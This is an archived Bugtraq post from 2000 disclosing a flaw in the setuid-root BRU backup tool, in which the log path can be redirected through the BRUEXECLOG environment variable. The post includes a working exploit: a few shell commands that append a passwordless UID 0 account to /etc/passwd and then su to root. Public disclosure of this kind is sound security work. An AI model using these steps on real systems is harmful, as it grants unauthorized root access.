Bugtraq mailing list archives

BRU Vulnerability


From: comsec.admin () GTE NET (root)
Date: Tue, 6 Jun 2000 14:22:24 -0700


We have found a vulnerability in BRU during our 'Security Contest' for
our company.

The details are included.


--

Riley Hassell
Network Security
Speakeasy Networks

1-206-728-9770 ext151

1-206-917-5151 Direct Line




BRU backup software Vulnerability:

        Description:
                You can change the log file BRU uses by changing the
                BRUEXECLOG environment variable. Since bru is setuid
                root you can append to any file on the system.

        Exploitation:

                $ BRUEXECLOG=/etc/passwd
                $ export BRUEXECLOG
                $ bru -V '
                > comsec::0:0::/:/bin/sh
                > '
                $ su comsec
                #

        Temporary fix:
                Why do normal users need to run bru? ;)

